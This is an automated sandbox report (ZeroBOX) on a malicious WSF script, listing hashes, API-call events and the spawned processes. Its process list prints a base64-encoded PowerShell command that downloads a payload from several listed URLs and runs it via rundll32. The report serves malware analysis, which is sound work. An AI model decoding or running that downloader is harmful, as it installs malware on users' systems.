Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 6, 2023, 9:49 a.m.	April 6, 2023, 9:51 a.m.

Size	193.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`580db0d8104da2b048b9c8e93b31fe41`
SHA256	`7d286769b5858989d308c2e53e151cd3f753e9697c6e74bff86bc8ef552f8334`
CRC32	`930C6B85`
ssdeep	`6144:MJWZb9BNo3CYkaj3riSPYzyN4NFkQEX6vnNUvaM:MT3hj3d3uNkN`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\AprilINV(P8398).wsf
300
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
  2088

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2023, 9:49 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 6, 2023, 9:49 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005119d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511f98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00512418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 9:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00511e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 6, 2023, 9:49 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 133 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02781000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 9:49 a.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

